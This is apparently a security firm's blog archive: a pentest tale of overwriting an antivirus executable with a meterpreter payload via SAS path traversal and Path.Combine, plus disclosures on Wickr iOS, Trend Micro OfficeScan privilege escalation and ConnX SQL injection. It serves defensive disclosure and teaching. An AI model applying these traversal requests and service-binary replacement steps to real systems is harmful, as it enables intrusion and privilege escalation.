Anti-malware malware

This blog post aims to share a tale from a recent pentest that I felt was too good to keep to myself.

Note: The names of the innocent have been changed to protect the guilty.

Background

The testing involved a web application that was designed to guide users through an application process that required documents to be submitted to the server via a file upload. The client for this pentest was understandably concerned about the security implications of handling untrusted user-supplied files, so they devised a system that would vet said files for malware prior to making them available for review.

The basic process for validating the files was as follows:

In terms of the architecture behind the system, a number of moving parts were introduced:

  • A cloud-based file storage container for hosting uploaded files
  • An API endpoint for generating shared access signatures (SAS) granting access to file uploads
  • A virtual machine responsible for performing antivirus checks and document manipulation of untrusted files
  • Polling functions that were executed once files were added to the cloud storage (to initiate the document sanitisation process)

Note: As a pentester, I had access to a lot of information about how the system worked behind the scenes. I had access to the source code, and the logging system, so I could validate when uploaded files were successfully or unsuccessfully processed.

SAS API Endpoint

Shared access signatures (SAS) are signed requests that provide access to Azure’s Blob Storage. Access can be either read or write, depending on the usage requirements. In this instance, the application exposed an API endpoint that would generate the write-only SAS on behalf of the user, similar to:

GET /GetSAS?upload=Myfile.png HTTP/1.1
Host: application.example.com

Which would return:

https://example.blob.core.windows.net/untrusted/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

The source code for this component resembled the following (NOTE: The actual code was C#/Dotnet, but I’ve used Python to demonstrate the logic):

def getSAS(filename):
    blobname = filename.split("/")[-1] # strip any path characters
    blobname = "untrusted/" + blobname
    sas = cloud.GetSAS(blobname, access="write")
    return sas

There are a couple of problems with this approach.

First, the user-supplied filename was preserved by the SAS-granting API endpoint. The application generated a UUID for each file using Javascript; however, as this process was performed client-side, the UUID could simply be overwritten with any filename. This meant that the efforts the application took to generate UUIDs for uploaded files were fruitless.

Second, the above sample code failed to adequately strip non-forward-slash filesystem metacharacters out of the supplied filename. Despite removing forward slashes (by way of truncating anything preceding the final forward slash in the filename), the application happily processed requests for filenames containing path characters such as ~, \, :, ., etc. This was a stroke of luck for the tester, as the SAS API would happily grant a valid SAS for paths containing such characters.

As a result, it was possible to perform a directory traversal attack and write to additional file containers outside of the designated untrusted/ directory. For example, an attacker could write into a super secret container by using path traversal and back slashes (such as ..\..\..\..\..\supersecret) within their request:

GET /GetSAS?upload=..\..\..\..\supersecret\Myfile.png HTTP/1.1
Host: application.example.com

Which would return https://example.blob.core.windows.net/supersecret/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

Although read access was not granted to the SAS, write access was. This meant that the attacker could overwrite known files within containers inside (or outside) of the designated container.

Whilst neat, this was by no means interesting. We have to get a shell after all. And this river was running dry.

Time to regroup.

Cloud file storage and virtual directories

While testing the previously discussed directory traversal vulnerability, I noticed some curious behaviour. By requesting an SAS for a file within a defined directory tree (such as /this/is/Myfile.png), the file upload system would happily serve the file at that path. For example:

GET /GetSAS?upload=this\is\Myfile.png HTTP/1.1
Host: application.example.com

https://example.blob.core.windows.net/untrusted/this/is/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

As it happened, the file storage container would create a virtual directory structure to match the filename of the uploaded file.

The storage container for this example would look like this:

untrusted/
└── this
    └── is
        └── Myfile.png

This was starting to get interesting.

The virtual machine

So, at this point I knew that uploaded files would get downloaded to a virtual machine and then scanned for viruses. The application logic involved with this task resembled the following: (NOTE: Again, the actual code was C#/Dotnet, but I’ve used Python to demonstrate the logic)

def trigger_scan(filename):
    file_contents = cloud.download_file(filename) # get the file from the blob store
    tmp_path = os.path.join(create_temp_path(), filename) # store this in a safe temp directory! (assume create_temp_path() returns "C:\Temp")
    with open(tmp_path, 'wb') as f:
       f.write(file_contents)
    x = subprocess.check_output(["C:\\Program Files (x86)\\AVProgram\\scanner.exe", tmp_path])
    # [...] Check that file was not malicious, then perform subsequent document transformation

So upon successful file upload, the function trigger_scan would execute automatically, performing the necessary operations to validate and then sanitise and transform the supplied file. At first I toyed around with trying to escape out of the process execution call to no avail.

What I could do; however, was control the filename that was concatenated using the Path.Combine function using the previously discussed path traversal attack. I toyed around with uploading various files for a while, and, after a bit of local testing with a minimal PoC, I determined that if the second argument to the Dotnet method Path.Combine was an absolute path, it ignored the first argument and returned the supplied absolute path.

According to the docs, this is intended behaviour:

“If one of the specified paths is a zero-length string, this method returns the other path. If path2 contains an absolute path, this method returns path2.” (Microsoft docs)

The following sample C# code demonstrates the vulnerability:

using System;
using System.IO;

namespace Program
{
    class Program
    {
        static void Main(string[] args)
        {
            string tmp = Path.GetTempPath();
            Console.WriteLine("Tmp path prefix is: {0}", tmp);

            string x = Path.Combine(tmp, "C:\\test\\a.exe");
            Console.WriteLine("Concatenated path is: {0}", x);
        }
    }
}

When executed:

C:\Users\Hacker>Hack.exe
Tmp path prefix is: C:\Users\Hacker\AppData\Local\Temp\
Concatenated path is: C:\test\a.exe

At this point I had a revelation: I control the absolute path that the file that I am uploading will be written to.

Further testing

Using the power of supplied logs (thanks client!) I could determine certain characteristics of my exploit attempts. I started to enumerate the logged messages, with a particular focus on the error messages.

I tested using a number of samples, including a benign control group (no logged error, application successfully processed the file), the EICAR test AV file (infection found! Oh no!). I then started writing benign files to locations on the system, such as C:\Windows\System32\a.png (Permission Denied!) and C:\test.png (no logged error, application successfully processed the file). At this point I knew I was onto something. If I could successfully write a file to C:\, then the user account performing the operation must have been highly privileged.

Putting it all together

So, to recap; at this stage I:

  • Was able to issue valid SAS for arbitrary locations on the filesystem
  • Could control where the file was written to disk
  • Had the location of a file that was guaranteed to be executed upon successful upload
  • Appeared to be able to write files as a privileged user

I hope you can see where this is going.

Payload

First thing’s first, I needed a payload. I was quietly confident that no competing AV would be in play here (since I knew the AV engine in use), so I went from zero to yolo and smashed out a meterpreter reverse_https payload using msfvenom.

Staging the payload

I then needed a valid SAS for my target payload. As discussed previously I could inject valid filesystem metacharacters into my filename, with the exception of /. I was not prepared to risk using space characters for the payload, so I opted to use another Windows trick; the short name. Long story short (pun totally intended), Windows short names are a means for providing mostly-unambiguous representations of path names greater than 15 characters. As usual it’s some relic from the past that is required for backwards compatibility. Don’t think about it. It’s probably better that way.

Anyway, my payload ended up looking like this:

GET /GetSAS?upload=.\C:\\PROGRA~1\\AVProgram\\scanner.exe HTTP/1.1
Host: application.example.com

Oh yeah that’s right. My goal here was the goods. I’m not just going to compromise this server. No; I’m going to replace the AV’s executable with my payload.

Anyway, the previous request returned the SAS:

https://example.blob.core.windows.net/untrusted/C:/PROGRA~1/AVProgram/scanner.exe?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

Upload… annnnndddd

I then uploaded the file to the SAS endpoint, and within seconds Metasploit had made a new friend 😀

Bonus points: The trigger_scan() function was running as the NT AUTHORITY\SYSTEM user!

Bonus Bonus points: The AV program is toast at this point; I’ve replaced the binary with a malicious .exe. This has the interesting side-effect of ensuring that anytime a legitimate user uses the application as intended; I get a shell.

Bonus Bonus Bonus points: The application now outright fails to complete its primary purpose of scanning untrusted files for viruses.

Recommendations

Honestly, I am kind of astounded that any of this actually worked. Fortunately, there are numerous ways that the exploit in question could have been trivially stopped dead in its tracks.

  • Flatten filenames to a GUID <- this would have done it
    • Have the SAS endpoint generate a filename for the destination file using a GUID, rather than accepting the user-supplied one
  • Copy the file to the filesystem sans-extension
    • Extension was unnecessary in this context, given the operations required (i.e. AV scanning)
  • Don’t run services as SYSTEM/privileged users…
    • In this instance, given that the AV was executing on demand against a file, administrator privileges were unnecessary
  • Restrict storage container access for the SAS
    • Also don’t let it create virtual directories
  • (Less recommended) If you are going to accept the untrusted filename; sanitise ALL file path metacharacters
    • Probably don’t do this though. Seriously.

There’s just something deeply philosophical (and satisfying) about defeating an anti-malware system by overwriting the anti-malware program with malware.

Making Wickr Weaker

As part of Asterisk’s new mobile application security assessment service offering, we decided to use our acquired skills and research a high profile mobile app. Luckily, Malcom Turnbull helped us with the decision making process by confirming that he uses Wickr to keep his messages private.

For those who are not familiar with the app, it is a messaging platform that is prioritises privacy above all costs. The app has been through rigorous security assessments where the results are published on their website. Additionally, some of the research that was performed was presented at DEF CON 21.

This gave us an extra adrenaline boost knowing that the challenge was not going to be easy. To get to the juicy part, we reported two interesting vulnerabilities to Wickr that we found within version 2.5.2 (iOS) which was the most recent version at the time of initial contact (May 2015). It is important to note that we did not look at the Android version and so there may be applicable information or crossover to the Android app as well.

  • Vulnerability #1: Session Lock Authentication Bypass

Wickr has a built-in ‘Auto Lock’ feature that allows a user to set a time period before they are required to enter their password to the application. By default, the timeout value is 1 hour, however, a user can change that value to 5 seconds, which would appear to be an even more secure option. The screenshot below shows the ‘Auto Lock’ feature within Wickr’s settings view:

autolockOnce the app is moved into the background and then reopened (after the time set in the ‘Auto Lock’ functionality has exceeded), the user is required to re-enter their password to access the application. The ‘Session Lock’ view can be seen in the screenshot below:

sessionlock

‘SessionManager’ is the class that controls the session lock and implements various methods, for example:

• -(void)sucessfullyResumedSession
• -(BOOL)unlockSessionWithPass:(id)pass

It was observed that the ‘sucessfullyResumedSession’ method was called after the ‘unlockSessionWithPass’ method, under the condition that the password was confirmed to be correct. It was also observed that when ‘sucessfullyResumedSession’ is called, the ‘Session Lock’ view is removed and the user is granted normal access to the application including the sensitive data it holds.

With this in mind, if a reference to the current ‘SessionManager’ object is obtained, it is possible to invoke the ‘sucessfullyResumedSession’ method and therefore bypass the authentication requirement, gaining access to the user’s sensitive data.

The figure below demonstrates how the authentication can be bypassed, with the aid of Cycript on a jail broken device:

auth_bypass

The screenshot below shows the access gained from the steps above:

auth_bypass

  • Vulnerability #2: Persistent Sensitive Information Stored Unencrypted within the App’s Memory Space

Wickr’s authentication mechanism requires the user to input their password before gaining access to their sensitive information. It is assumed that once authentication is successful the password is no longer required for the application to function properly. This is thought to also be the case when the application enters the background as well as when the user is logged out completely.

While using the application it was observed that the password used for authentication remained in the application’s memory space in clear-text.
The authentication view is controlled by the ‘UserLogin’ class, which contains various properties, one of them, for example, is:

• UITextField* passBox

The ‘passBox’ property is used by the ‘UserLogin’ view controller to store the password entered by the user to authenticate. The following screenshot shows the ‘UserLogin’ view and the ‘passBox’ text field:

login

After the user authenticates successfully, the application seems to dereference the ‘UserLogin’ view controller, however, the data that the object holds was not overwritten. By writing the heap memory space of the application into a file and extracting strings from the file it is possible to recover the clear-text password. This process holds effective also when the user has explicitly logged off from the application with the application running inactive in the background.

The following figure shows the process of writing the heap memory into files by using heapdump on a jail broken device:

heapdump

For Proof-of-Concept purposes, a string that is known to be part of the password was searched within the written files. The highlighted portion is the legitimate password:

grep

For further details please refer to our advisories here and here.

Communication timeline:

  • 01/05/2015: Vulnerabilities were reported to Wickr
  • 08/05/2015: Asterisk requested reception to be confirmed
  • 08/05/2015: Wickr confirmed reception
  • 01/07/2015: Asterisk reminded Wickr of the disclosure date
  • 10/07/2015: Wickr confirmed the advisory reviewing process
  • 31/07/2015: Asterisk reminded Wickr of the disclosure date and offered additional week
  • 11/08/2015: Wickr confirmed that the advisory is still undergoing a review
  • 13/08/2015: Asterisk requested an update
  • 13/08/2015: Wickr acknowledged the bug  and offered $2000 reward
  • 13/08/2015: Asterisk sent banking details
  • 18/08/2015: Wickr requested to be given up to 6 more months to fix the issues
  • 18/08/2015: Asterisk asked to clarify the reasons for the requested additional time
  • 22/08/2015: Wickr responded with the reasons for the delay and clarified that only one bug (RAM) was acknowledged as the other one (authentication bypass) was already reported on the 16th of January, 2014
  • 24/08/2015: Asterisk notified Wickr that it forfeits the Bug Bounty Reward and will publish the advisories

 

Vulnerability Disclosure: Local Privilege Escalation through Trend Micro OfficeScan

Although we enjoy offensive work, we appreciate defensive work just as much. In this post we’ll discuss how we managed to escalate our privileges on a Windows host while performing a SOE assessment.

Focusing specifically on our assessment, we spotted that our client did not skip on the installation of an Anti-Virus program, in our case Trend Micro OfficeScan version 11.1. Normally these kind of programs run as a Windows service in the context of the most privileged user (SYSTEM). Looking closely at OfficeScan’s file permissions revealed that the executable file used to be loaded as the service upon system start-up was writeable by the ‘Everyone’ group.

The reason the file permissions were not secure is due to an installation feature. In short, during the installation process, administrators are asked if they want to install the Anti-Virus using a ‘normal’ or ‘high’ security setting. Administrators who chose the ‘normal’ setting unknowingly provide the option for normal users to escalate their privileges on the host.

Exploitation of this configuration is fairly simple and straight forward. For all intents and purposes the following 3 steps were followed:

  1. Reboot the Windows system into Safe Mode so that the OfficeScan processes are not running.
  2. Overwrite the ntrtscan.exe (Real Time Scan Service) executable with a malicious executable of your choosing. In our instance, we used a windows service template file and added a few commands which will attempt to create a new local user account and added it to the Local Administrators group.
  3. Reboot the Windows system. During start-up, the Real Time Scan Service executable is started, executing the malicious payload.

For further details please see our advisory or Trend Micro’s advisory.

Communication timeline:

  • 16/04/2015: Vulnerabilities were reported to Trend Micro
  • 16/04/2015: Trend Micro confirmed reception of advisory
  • 30/04/2015: Trend Micro did not confirm vulnerability
  • 05/05/2015: Asterisk asked for disclosure permission
  • 05/05/2015: Trend Micro confirmed reviewing the advisory
  • 14/05/2015: Trend Micro confirmed vulnerability and requested to hold disclosure until July, 10
  • 14/05/2015: Asterisk confirmed disclosure date
  • 04/06/2015: Trend Micro requested a change of disclosure date to August, 4
  • 10/06/2015: Asterisk confirmed updated disclosure date
  • 03/08/2015: Asterisk reminded Trend Micro of the disclosure date
  • 04/08/2015: Trend Micro requested a change of disclosure date to August, 7
  • 04/08/2015: Asterisk confirmed the updated disclosure date
  • 07/08/2015: Disclosed by both parties

Vulnerability Disclosure: SQL Injection in ConnX ESP HR Management System (CVE-2015-4043)

During an engagement for one of our clients we came across ConnX‘s ESP HR Management System and found that it was vulnerable to SQL Injection. In line with our responsible disclosure policy, the vendor of ConnX was contacted to advise them of the issue and they were advised that this information would be published in 90 days.

We have received an acknowledgement from ConnX in regards to this issue stating:

… we are now releasing a version of ConnX where the issue that you brought to my attention has been addressed.

90 days have now passed from our initial disclosure to ConnX, and we are publishing details of the issue.

ConnX‘s ESP HR Management system is an application designed to aid payroll management of staff in organisations. We have identified that the input validation in the username parameter of the login page was not implemented correctly as noted below:

  • Location: /frmLogin.aspx
  • Parameter: ctl00$cphMainContent$txtUserName

Exploitation of this vulnerability would allow attackers to extract the data used by the ESP HR Management System. This information includes sensitive employee personal details.

The full advisory can be found here.

Communication timeline:

  • 2015-03-25: ConnX contacted with details of vulnerability
  • 2015-04-20: ConnX replied with details about mitigation
  • 2015-06-30: Publication of vulnerability

 

Information Security Root Causes

We do a lot of technical security testing at Asterisk, and this often brings up healthy discourse on the root cause of issues found. After thinking about this for a while I came up with a few themes which I think probably capture the majority of security issues. In fact, I think the following issues are possibly the root-cause problems that most information security professionals are trying to manage when protecting their organisation’s information. This management of issues is an important factor, as most people can’t manage threat agents. Unless you’re a government or other high-level entity, it’s unlikely you will be able to take action against attackers sitting somewhere on the other side of the world. These issues are not mutually-exclusive, but I do like the way it feels like a fairly manageable set of problems to solve.

Most of the issues we deal with as information security professionals come down to:

  1. Insecure software
  2. Misconfigured software
  3. People-related issues*
  4. Physical security issues

Surprised? Not really.

*nb: It’s important to note that these root-causes are often interrelated. Insecure or misconfigured software certainly relates to people-issues as well as other underlying issues. This interrelationship is important, but the distinction can be useful in breaking down how to address these problems.

Let us try and analyse these causes. Most of the layers of defence that organisations are applying to try and protect their assets are there to reduce attack surface area. In the case of web-based technology, we have firewalls, IDS / IPS, WAF and other related technical controls attempting to manage and reduce the likelihood that insecure or misconfigured software is exploited. If the layers of defence, and the system itself, have addressed insecure software issues, misconfiguration issues and was physically secure, it’s likely that any further exploitation is related to weak passwords, or passwords being disclosed through alternative system breaches (Take the LinkedIn breach for example).

Weak passwords are an example of a security issue that relates to both insecure software and people-related issues. More secure software may force users to use long, difficult to remember passwords. Unfortunately, if the credential is written down, or shared with someone else, then it doesn’t matter if it’s a strong password. In these particular instances, educating the user of better password practices may help.

Of the above issues, the people-related ones are often the more difficult to manage. Social engineering has proven itself an effective tool in an attacker’s arsenal over and over again, and even if you train your people, it’s difficult to reduce the exposure the same as you would with other issues. Whether this is due to the difficulty of educating the masses to social engineering, or that many information security professionals aren’t as good at addressing people-issues compared to technical-issues we can’t really say.

This list is not all that different from MITRE’s Common Attack Pattern Enumeration and Classification (CAPEC) ‘Domains of Attack’. Below is our root-causes, with the various CAPEC domains:

Root-cause CAPEC Domain
Insecure software Communications
Software
Supply Chain*
Misconfigured software Communications
Software
Supply Chain*
People-related issues Social Engineering
Supply Chain*
Physical security issues Communication (partially)
Hardware
Physical Security
Social Engineering
Supply Chain*

*nb: Supply chain relates to insecure or misconfigured software, people related issues or physical security weaknesses further up the supply chain.

Okay, so if we have these root causes, what can we do about them? Our subsequent blog posts will look at each of these root causes in further detail.